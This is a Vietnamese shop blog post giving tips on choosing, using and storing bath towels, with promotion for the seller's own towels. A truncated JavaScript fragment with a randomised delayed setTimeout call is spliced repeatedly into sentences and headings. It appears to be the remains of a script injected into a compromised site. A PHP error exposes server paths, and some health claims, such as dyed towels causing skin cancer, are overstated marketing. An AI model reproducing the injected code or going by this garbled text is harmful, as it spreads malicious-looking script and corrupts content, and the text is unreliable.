• Login
    Not registered yet? Register

  • 0
    Cart

Warning: getimagesize(/home/thidf6c2/public_html/wp-content/uploads/2016/08/comfortable-towel-bath-design-by-kassatex-in-modern-bathroom-and-kassatex-reviews-plus-kassatex-sale-680x680.jpg): failed to open stream: No such file or directory in /home/thidf6c2/public_html/wp-content/themes/rttheme19/rt-framework/functions/rt_resize.php on line 216
Tháng Tám 17, 2016

Một số lưu ý khi lựa chọn và sử dụng khăn tắm

Khăn tắm gia đình là đồ dùng cần thiết trong mỗi gia đình; tuy nhiên không phải ai cũng biết cách chọn và sử dụng khăn tắm andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}đúng cách. Các bà mẹ nên chọn và sử dụng đồ dùng này theo các tiêu chí sau:

  1. Số lượngandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

Mỗi một thành viên trong gia đình nên có một bộ gồm khăn tắm, khăn mặtandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);} và khăn lau tay,andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);} tránh việc sử dụng chung các loại khăn trong gia đình vì có thể lây bệnh cho người khác. Khi chọn khăn tắm nên lựa chọn theo vóc dáng cơ thể. Nếu bạn là người cao lớn, hãy tìm những chiếc áo choàng tắm, nó sẽ thấm khô cơ thể bạn 1 cách nhanh chóng và dễ dàng hơn. Còn nếu bạn là người nhỏ nhắn, một chiếc khăn tắm cỡ vừa sẽ khiến bạn cảm thấy thoải mái hơn khi dùng.

  1. Màu sắcandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

Khăn tắm trắng tạo cảm giác sang trọng, tinh tế do đó hay được các bà mẹ lựa chọn. Nếu muốn tạo không gian phòng tắm ấn tượng thì nên chọn màu khăn tương phản với màu tường và sàn phòng tắm.

Bạn cũng có thể lựa chọn khăn theo sở thích của mỗi thành viên trong gia đình. Tuy nhiên, nên tránh chọn khăn nhiều họa tiết trang trí và nhiều màu vì các họa tiết có thể làm xước hoặc rát da. Khăn tắm nhiều màu cần nhiều hóa chất để nhuộm, do đó cũng không tốt cho sức khỏe.

khăn tắm gia đình

khăn tắm gia đình

Khăn tắm Thiện Phúandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);} có nhiều kích thước, màu sắc, có thể quấn người hoặc lau tóc

  1. Tính năngandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

Nên chọn khăn mềm mại, thấm nước tốt và nhanh khô. Phòng tắm thường là nơi thiếu ánh sáng và chứa nhiều vi khuẩn, một chiếc khăn nhanh thoát hơi nước sẽ là sự lựa chọn đúng đắn trong việc ngăn ngữa vi khuẩn tích tụ trên bề mặt khăn tắm của gia đình bạn.

Khăn tắm phải mềm mại, êm ái để phù hợp với mọi làn da, kể cả làn da nhạy cảm của bé. Ngoài ra, chức năng chính của khăn tắm là để lau khô nước bám trên cơ thể sau khi tắm, vì vậy, hãy chọn loại khăn có khả năng thấm hút nước tốt để chắc chắn da bạn không còn bị dính nước.

Điều quan trọng khi sử dụng khăn tắm là nó không được phai màu và bung sợi ra trong quá trình sử dụng. Khăn tắm càng nhiều màu càng chứa nhiều hóa chất để nhuộm. Những hóa chất này khi phai ra sẽ ít nhiều ảnh hưởng đến sức khỏe cũng như làn da của bạn, trường hợp nghiêm trọng còn có thể gây viêm da hoặc ung thư da. Hơn nữa, chắc hẳn bạn cũng không muốn sau khi lau người xong có những sợi bông tơ nhỏ bám trên cơ thể ? Những sợi bông này sẽ gây cảm giác ngữa ngáy khó chịu cho da, cũng như có thể gây dị ứng, ho hay viêm mũi nếu sợi lông bung ra quá nhiều. Vì vậy, hãy nhớ rằng, một chiếc khăn tắm tốt sẽ không bị phai màu và không bị rụng lông trong quá trình sử dụng.

khăn tắm gia đình

khăn tắm gia đình

Ưu điểm của khăn tắm Thiện Phú là không bị phai màu, không bị bung sợi vải,
không khô nhớt hay có mùi hôi trong quá trình sử dụng

  1. Bảo quản khănandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

Chắc hẳn mọi người không ai muốn chiếc khăn tắm của mình bị hôi nhớt hay có những vệt màu xuất hiện trên khăn. Khăn bị hôi nhớt hay xuất hiện những vệt màu là do vi khuẩn sinh sôi trên bề mặt khăn gây ra. Để tránh tình trạng như vậy, hãy lựa chọn những loại khăn nhanh khô để đảm bảo an toàn cho sức khỏe cho gia đình bạn.

Khăn tắm và các loại khăn khác sau khi sử dụng cũng nên vắt khô và phơi ra ngoài ánh sáng để hạn chế vi khuẩn. Trước khi sử dụng khăn lần đầu nên giặt qua một lần để đảm bảo rửa sạch những hóa chất và bụi bẩn có trên khăn trong quá trình sản xuất và đóng gói.

Tắm là việc làm thường xuyên của mỗi người để loại bỏ hết những bụi bẩn bám trên cơ thể. Lựa chọn một chiếc khăn tắm chất lượng sẽ giúp mọi người thực sự có những phút giây thư giãn sau một ngày học tập và làm việc căng thẳng. Nó cũng bảo vệ gia đình bạn khỏi những mầm mống bệnh không đáng có.